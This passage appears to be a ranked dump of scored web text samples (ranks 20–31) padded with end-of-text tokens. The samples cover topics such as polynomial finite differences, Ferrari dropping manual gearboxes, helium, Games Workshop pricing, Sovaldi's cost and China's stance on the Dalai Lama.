sale.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 1392640.0 +<|begin_of_text|>Problem 1.1: Above, we saw that \(n^2\), a quadratic, had a linear sequence as its finite differences. Prove this for the general quadratic. + +If the sequence is \(A n^2 + B n + C\), the finite differences are of the form \(A[(n+1)^2 - n^2] + B[(n+1) - n] + C[1 - 1] = (2A)n + (A + B)\), which is linear + +Problem 1.2: What would be the corresponding theorem for cubics? Prove it. + +We know that the cubic is of the form \(A n^3 + q(n)\), where \(q(n)\) is quadratic. Our finite differences are \(A [(n+1)^3 - n^{3}] + [q(n+1) - q(n)]\). The finite differences of the second term are linear and of the first are quadratic, so the overall differences are quadratic. + +Problem 1.3: Extend the above to general $n$-th order polynomials. + +Induct. When you expand \((n+1)^k - n^k\), we get a polynomial of degree \(k-1\); induct downward on \(k\). + +Problem 2.1: The "Tribonacci" sequence is defined by \(T_{n+3} = T_{n+2} + T_{n+1} + T_n\) and starting values \(T_1 = T_2 = T_3 = 1\). What is the smallest \(n\) for which \(T_n\) is over 9000? Over \(10^{10}\)? A calculator might be helpful, but don't just brute force the answer. + +I warn you, this problem is somewhat hard. Let's begin. We first find the characteristic polynomial, \(P(\lambda) = \lambda^3 - \lambda^2 - \lambda - 1\). Now we need to find roots, but this polynomial does not factor in any nice way. What you can do, however, is estimate. \(P(1) = 1 - 1 - 1 - 1 = -2\), and \(P(2) = 8 - 4 - 2 - 1 = 1\), so we know that our answer is close to 2. We can check \(1.8\) or so, and we +================================================================================ +Rank = 21; Score = 1368064.0 +<|begin_of_text|>Share + +There was a time when manual transmissions were synonymous with performance cars, but that time is past. + +Ferrari is the latest automaker to retire the clutch pedal, a move that will probably seem like a gut punch to fans of stick shifts, but isn’t too surprising given the low sales of manuals in Ferraris and other high-end performance cars over the past few years. And that’s not even the primary reason why Ferrari is ditching manuals. + +“Ferrari is design, performance, and state-of-the-art technologies. There’s no manual transmission that can beat this performance and therefore we have decided to stay on the double-clutch gearbox,” Michael Hugo Leiters, the automaker’s chief technology officer, said in an interview with Motor Authority at the recent 2016 Paris Motor Show. Even a well-shifted manual can’t match the speed of modern dual-clutch transmissions, after all. + +Read more: 2016 Ferrari 488 GTB first drive + +That argument is a compelling one for manufacturers constantly looking to increase the performance of their cars, both to win over consumers and to achieve bragging rights. For decades, manual transmissions had a performance advantage over those without clutch pedals, but today’s dual-clutch transmissions have erased that advantage. They shift faster, and they help carmakers snag customers that might have been discouraged by having to master a manual. + +Ferrari isn’t alone in leaving the manual transmission behind. Lamborghini and McLaren don’t have a single manual between them, and Porsche has made the dual-clutch PDK transmission mandatory on the highest-performance versions of its 911. Porsche still offers manuals on lower-level models, though, and Aston Martin still offers them throughout its range. + +Manuals are also much easier to find on less-expensive cars. Once you leave the six-figure realm, they start to become more common on performance cars. The manual transmission is definitely on the endangered species list, but it’s not extinct … yet.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 22; Score = 1359872.0 +<|begin_of_text|>5 + +Remove the nozzle from the pump and insert it into the fuel filler opening. Pull the handle inside the nozzle upward to release the gas into your tank. The nozzle may have a trigger-lock feature that holds the handle in place while fueling to prevent having to stand and hold it. Once the tank is full, the gas pump will shut off with a click and gas will stop flowing. If you do not intend to completely fill your tank, you will have to watch the pump to see when you have reached the desired dollar amount of gasoline and then release the handle, or stop the automatic flow by pulling up on the handle to release it. Replace the nozzle back on the pump, reattach your fuel filler cap, shut the fuel filler door and you’re on the road again.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 23; Score = 1335296.0 +<|begin_of_text|>It's Elemental + +The Element Helium + +[Click for Isotope Data] + +2 He Helium 4.002602 Atomic Number: 2 Atomic Weight: 4.002602 Melting Point: 0.95 K (-272.2°C or -458.0°F) Boiling Point: 4.22 K (-268.93°C or -452.07°F) Density: 0.0001785 grams per cubic centimeter Phase at Room Temperature: Gas Element Classification: Non-metal Period Number: 1 Group Number: 18 Group Name: Noble Gas + +What's in a name? For the Greek god of the sun, Helios. + +Say what? Helium is pronounced as HEE-lee-em. + +History and Uses: + +Helium, the second most abundant element in the universe, was discovered on the sun before it was found on the earth. Pierre-Jules-César Janssen, a French astronomer, noticed a yellow line in the sun's spectrum while studying a total solar eclipse in 1868. Sir Norman Lockyer, an English astronomer, realized that this line, with a wavelength of 587.49 nanometers, could not be produced by any element known at the time. It was hypothesized that a new element on the sun was responsible for this mysterious yellow emission. This unknown element was named helium by Lockyer. + +The hunt to find helium on earth ended in 1895. Sir William Ramsay, a Scottish chemist, conducted an experiment with a mineral containing uranium called clevite. He exposed the clevite to mineral acids and collected the gases that were produced. He then sent a sample of these gases to two scientists, Lockyer and Sir William Crookes, who were able to identify the helium within it. Two Swedish chemists, Nils Langlet and Per Theodor Cleve, independently found helium in clevite at about the same time as Ramsay. + +Helium makes up about 0.0005% of the earth's atmosphere. This trace amount of helium is not gravitationally bound to the earth and is constantly lost to space. The earth's atmospheric helium is replaced by the decay of radioactive elements in the earth's crust. Alpha decay, one type of radioactive decay, produces particles called alpha particles. An alpha particle can become a helium atom once it captures two electrons from its surroundings. This newly formed helium can eventually work its way to the atmosphere through cracks in the crust. + +Helium is commercially recovered from natural +================================================================================ +Rank = 24; Score = 1302528.0 +<|begin_of_text|>Games Workshop pricing in both Australia and New Zealnd have been a tough topic for a long time now. I am personally not down there, but feel for the pain they feel. I am also not an expert on why or how these prices end up the way they do, so when Alistar of War Incorporated wanted to do a breakdown of pricing in Australia and New Zealand, I said go for it. So here is Alistair's take and analysis on the subject. + +Alistair, War Incorporated, NZ + +The Antipodean Tax + +Games Workshop customers in Australia and New Zealand have been suffering a huge price difference for Games Workshop products when compared to their UK and US counterparts. It’s really hurting the Games Workshop hobby over here, and there has been no explanation for it from Games Workshop headquarters. + +The current pricing structure seems to have been set back in around 2006, sadly at that time the AUS and particularly NZ dollar was at its weakest trading levels in recent history, it was almost NZ$3 against the British pound. This is where the price point for recent releases remain, despite 5 years of a steadily strong NZ$ and AUS$, compared to the British Pound. Current exchange levels are around NZ$2.3 against the British pound, and look set to stay that way for some time. + +But words aside, the numbers alone really do all the talking. The table below shows an international price comparison of recent releases from Games Workshop. What jumps out straight away is that the US and UK prices are almost the same, and certainly within a range that nobody would quibble about, the NZ prices however are in some instances cost is creeping towards an additional 50%; + +Exchange rate 09/10/15 Pounds = 2.3 US$ = 1.4 + +Product Pounds NZ Equiv US$ NZ Equiv NZ$ Retail Extra Cost NZ$ % extra cost c.f. £ Skarbrand £80.00 $184.00 $130.00 $182.00 $235.00 $51.00 28% Wrathmongers £34.50 $79.35 $57.00 $79.80 $113.00 $33.65 42% Skarr Bloodwrath £18.00 $41.40 $30.00 $42.00 $59.00 $17.60 43% Slaughterpriest £18.00 $41.40 $30.00 $42.00 $60.00 $18 +================================================================================ +Rank = 25; Score = 1294336.0 +<|begin_of_text|>The current U.S. population is about 317 million. The current number of employed American workers is 144 million. + +According to the Bureau of Labor Statistics, among those paid by the hour, 1.6 million Americans earned the prevailing federal minimum wage of $7.25 per hour in 2012. (The data for 2013 hasn’t been released yet.) Of these, 484,000 are aged 16 to 19. + +So... the Democrats’ big idea on income inequality is one that will increase wages for... 1.1 percent of the workforce. + +The federal minimum wage is $7.25 per hour, although many states and localities require a higher wage by law. SeaTac, the municipality that surrounds Seattle-Tacoma International Airport, now requires $15 per hour. Democrats want to raise the federal minimum wage to $10.10 per hour, an additional $2.85 per hour. + +For a minimum-wage employee working 40 hours per week, that’s an additional $114 per week, before taxes. + +For a 30-hour-per-week worker, we’re talking about an additional $85.50 per week. + +With 1.6 million earning the federal minimum wage, averaging 35 hours per week, this would amount to $159.6 million in higher wages per week. That, times 52 weeks per year, amounts to about $8.2 billion. That may sound like a lot, but we have a $17 trillion economy. + +In short, an America with a $10.10-per-hour minimum wage would look indistinguishable from the one we see today on the issue of income inequality, as well as the economic aspect that more conservatives focus on, opportunity for advancement. (Getting that first entry-level, minimum wage may get harder as each employee becomes more expensive to the employer.) The workers making minimum wage may very well appreciate the extra $85 to $114 per week, but it’s not going to have much of an impact on their purchasing power. Small companies on tight margins may find the $2.85-per-worker-per-hour cost more difficult to handle, or may raise prices. Of course, if prices go up... that will eat into the budgets of those minimum-wage workers pretty fast, won’t it?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 26; Score = 1245184.0 +<|begin_of_text|>Cost Segregation Services + +Cost segregation services benefit commercial property owners in many ways. How you ask? Well, let’s look at a brief list: + +1) Cost segregation accelerates depreciation + +2) Cost segregation reduces income tax burden + +3) Cost segregation increases cash flow + +4) Cost segregation reduces real estate taxes + +5) Cost segregation reduces property insurance premiums + +6) Cost segregation places the commercial property owner in IRS tax compliance + +Cost segregation delivers results for any commercial property owner. Some industries, however, cost segregation works exceptionally well for. Here are some examples: + +1) Dentists & Orthodontists + +2) Physicians & Medical Groups + +3) Multi-family, apartments, condos + +4) Light manufacturing + +5) Heavy manufacturing + +6) Self storage facilities + +7) Restaurants + +8) Retail + +9) Office buildings, and many more + +Industries such as dental, medical and manufacturing have many specialized systems qualifying for accelerated depreciation. These include dedicated plumbing & electrical systems, dedicated lighting, specialized HVAC & air handling equipment, just to name a few. Cost segregation identifies these systems and “segregates” them out as 5-year assets. In many instances these systems can run several tens or hundreds of thousands of dollars. Imagine what it would do for your cash flow to reclassify those assets to 5-year. Let’s say you had $100,000 in dedicated systems being depreciated over 39 years….thats’s $2564 in depreciation per year. With cost segregation applied, now that $100,000 is depreciated over 5 years…that’s an average of $20,000 per year for this example. Actually, when the depreciation is accelerated into 5 years it becomes what is called MACRS or Modified Accelerated Cost Recovery System. This classification applies depreciation differently from the “Straight Line” method…it is called a 200% Declining Balance. + +So what does this mean ultimately? It means you now have more of your money today to use as you see fit. Cost segregation pulls tomorrow’s dollars out of your building and gives it to you today. Ask your CPA about the time-value of money. Your CPA or tax advisor will confirm your money is always worth more today than tomorrow! + +Cost segregation isn’t magic, smoke and mirrors. Cost segregation is a legitimate tax strategy allowing any commercial property owner to take more control of his or her finances. Cost segregation puts cash in your pocket. + +Cost segregation delivers results every time it’s applied! + +Do you want to learn more and find out how +================================================================================ +Rank = 27; Score = 1236992.0 +<|begin_of_text|>Close + +At $84,000 ($1,000 per pill), Gilead Sciences Inc.'s new hepatitis C drug is a pricey cure. It's also highly effective, producing 90% cure rates in trials and a reduction in side effects and other complications. Some argue it's the most important drug approved this year, offering hope to many afflicted with the viral disease. + +But the price of the drug, Sovaldi, is a threat to the efforts attempting to ease up on medical costs and relieve taxpayers. Senators Ron Wyden (D-Oregon) and Chuck Grassley (R-Iowa) sent a letter to Gilead requesting an explanation for the drug's high cost. + +"It is unclear how Gilead set the price for Sovaldi," the senators wrote in the letter, which was sent to the biopharmaceutical company on Friday, June 11. "That price appears to be higher than expected given the costs of development and production and the steep discounts offered in other countries." + +Pharmasset originally developed the hepatitis C drug and intended to price the therapy at $36,000. In 2011, Gilead Sciences acquired Pharmasset for $11 billion. Before the buy, Phramasset was working on the drug with Bristol-Myers Squibb, a company that was developing a combination drug that some said worked better. Possibly in an attempt to launch the drug faster, Gilead dropped Bristol-Myers Squibb after it acquired Pharmasset. + +Sovaldi could become one of the top-selling pharmaceutical therapies, as sales are projected to hit $8 billion this year. The senators argue that this will also increase Medicare and Medicaid costs. + +Previously in March, House Democrats had also sent a letter to Gilead asking for an explanation of their intended price tag. + +"This letter is a 'bank shot' that gets things going, with the goal of getting Gilead to significantly lower the price of Sovaldi," said Terry Haines, a political strategist. It was intended not only to put pressure on the company, but also to motivate other lawmakers to band together in the effort. + +"Our concern is that a treatment will not cure patients if they cannot afford it," the letter said. + +Hepatitis C, a contagious liver disease, can be fatal when left untreated. Approximately 3 million people suffer from the illness, and that number is expected to steadily rise. It spreads through contact with an infected person's blood. While the infection can be short-term, the chances of short-term +================================================================================ +Rank = 28; Score = 1220608.0 +<|begin_of_text|>942 > 353 + +A lot greater. To have just a break-even chance of meeting that 1.5 degree goal we solemnly set in Paris, we’ll need to close all of the coal mines and some of the oil and gas fields we’re currently operating long before they’re exhausted. + +“Absent some incredible breakthrough in mythical carbon-sucking unicorns, the numbers say we’re done with the expansion of the fossil fuel industry,” says Kretzmann. “Living up to the Paris Agreement means we must start a managed decline in the fossil fuel industry immediately—and manage that decline as quickly as possible.” + +“Managed decline” means we don’t have to grind everything to a halt tomorrow; we can keep extracting fuel from existing oil wells and gas fields and coal mines. But we can’t go explore for new ones. We can’t even develop the ones we already know about, the ones right next to our current projects. + +In the United States alone, the existing mines and oil wells and gas fields contain 86 billion tons of carbon emissions—enough to take us 25 percent of the way to a 1.5 degree rise in global temperature. But if the U.S. energy industry gets its way and develops all the oil wells and fracking sites that are currently planned, that would add another 51 billion tons in carbon emissions. And if we let that happen, America would single-handedly blow almost 40 percent of the world’s carbon budget. + +This new math is bad news for lots of powerful players. The fossil fuel industry has based its entire business model on the idea that it can endlessly “replenish” the oil and gas it pumps each year; its teams of geologists are constantly searching for new fields to drill. In September, Apache Corporation announced that it has identified fields in West Texas that hold three billion barrels of oil. Leaving that oil underground—which the new math shows we must do if we want to meet the climate targets set in Paris—would cost the industry tens of billions of dollars. + +For understandable reasons, the unions whose workers build pipelines and drill wells also resist attempts to change. Consider the current drama over the Dakota Access oil pipeline. In September, even after pipeline security guards armed with pepper spray and guard dogs attacked Native Americans who were nonviolently defending grave sites from bulldozers, AFL-CIO President Richard Trumka called on the Obama administration to allow construction to proceed. “Pipeline construction and maintenance,” Trumka said, “provides quality jobs to tens of thousands of skilled workers +================================================================================ +Rank = 29; Score = 1220608.0 +<|begin_of_text|>Tibetan spiritual leader was permitted by India to visit various areas in the north- east, including Arunachal Pradesh, + + +BEIJING: China today warned that it would consider as a "major offence" if any country or foreign leader hosts or meets the Dalai Lama as it deems the Tibetan spiritual leader a "separatist" trying to split Tibet from it.China routinely protests world leaders meeting the Dalai Lama. It also makes it mandatory for all the foreign governments to recognise Tibet as part of China to have diplomatic relations with Beijing.It also protested that when thethis year.The Dalai Lama fled Tibet in 1959 after a failed uprising against the Chinese rule in his Himalayan homeland. He has been living in India in exile since then."Any country or any organisation of anyone to accept to meet with the Dalai Lama in our view is a major offence to the sentiment of the Chinese people," said Zhang Yijiong, Executive Vice Minister of the United Front Work Department of the ruling Communist Party of China (CPC)."Also, since they have committed to recognising China as a sole legitimate government representing China it contravenes their attempt, because it is a serious commitment," Zhang said on the sidelines of the once-in-a-five-year congress of the CPC.Zhang said China would not accept the arguments of foreign countries and leaders to meet the 82-year-old Dalai Lama as a religious leader."I want to make it clear that the 14th Dalai Lama, the living Buddha handed down by history is a political figure under the cloak of religion," he said.Without naming India, he said Dalai Lama fled to the "other country" in 1959 "betraying his motherland and setup his so called government in exile".That "so called government" has the mission of a separatist agenda to split Tibet from China, he said."For decades, the group with 14th Dalai Lama as the leader never stopped to achieve that political agenda," he said.There is no legitimate government that that has recognised the Dalai Lama group, he said, adding that fewer countries and leaders are hosting him.Some countries may say the Dalai Lama is not a political figure but a religious figure and their officials meet him not in his political capacity."But that is not true and not right because every official represent their government and they are political figures," Zhang said."So we urge all to exercise caution and prudence to bear in mind the respect for China's sovereignty and for their +================================================================================ +Rank = 30; Score = 1187840.0 +<|begin_of_text|>+ 14 + +Architects Eisenman Architects + +Location Santiago de Compostela, Spain + +Category Cultural Center + +Executive Architect Andres Perea Ortega and euroestudios + +Client Fundación cidade da cultura de Galicia + +Project Year 2011 + +Photographs Duccio Malagamba + +Text description provided by the architects. The City of Culture is a new cultural center for the Province of Galicia in northwestern Spain. Its design evolves from the superposition of three sets of information. First, the street plan of the medieval center of Santiago is overlaid on a topographic map of the hillside site, which overlooks the city. Second, a modern Cartesian grid is laid over these medieval routes. Third, through computer modeling software, the topography of the hillside is allowed to distort the two flat geometries, thus generating a topological surface that repositions old and new in a simultaneous matrix never before seen. + +The original center of Santiago conforms to a figure/ground urbanism in which buildings are figural, or solid, and the streets are residual, or void spaces. Through this mapping operation, the project emerges as a curving surface that is neither figure nor ground but both a figured ground and a figured figure that supersede the figure-ground urbanism of the old city. Santiago’s medieval past appears not as a form of representational nostalgia but as a new yet somehow familiar presence found in a new form. + +The six buildings of the project are conceived as three pairs: the Museum of Galicia and the International Art Center; the Center for Music and Performing Arts and the Central Services building; and the Library of Galicia and the Galician Archives. Visitors’ experiences of any given building will be affected by its relationship to its immediate partner. The caminos, or pedestrian streets, between the buildings also open onto a public plaza, which is bordered by the six buildings and features landscape and water elements. The largest building is the Performing Arts Theater, which will stand 42.5 meters high. The heights of all of the buildings rise in gentle curves that seem to reconstruct the shape of the hilltop with their collective rooflines, which are all clad in stone and marked with the grids that inform the design of the site. + +The Library of Galicia and Galician Archives opened their doors on January 11, 2011, during a ceremony presided over by the Prince and Princess of Asturias. The 17,372-square-meter Library will accommodate one million books in open stacks, rare book archives, +================================================================================ +Rank = 31; Score = 1187840.0 +<|begin_of_text|>Ordering Numbers Least to Greatest Activity 1: Arrange the given numbers in ascending order or from the smallest to the largest. + +Click to Read More + +Do you know what ‘Ascending Order’ means? We say the numbers are in ascending order, when the numbers are arranged from the smallest to the largest. In this way we place the numbers in an increasing order. For example, look at these numbers; 49, 23, 107, 95 and 77. How to arrange these numbers in ascending order? First pick up the smallest out of all the given numbers. Then the second smallest, and so on until the largest. Likewise, in the given series of numbers 23, 49, 77, 95 and 107 are arranged in ascending order. With these online worksheets you can improve your ability in ordering numbers in ascending order by arranging numbers from the smallest to the largest. Learn ascending order by arranging numbers from least to greatest. Enjoy ordering numbers in ascending order!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_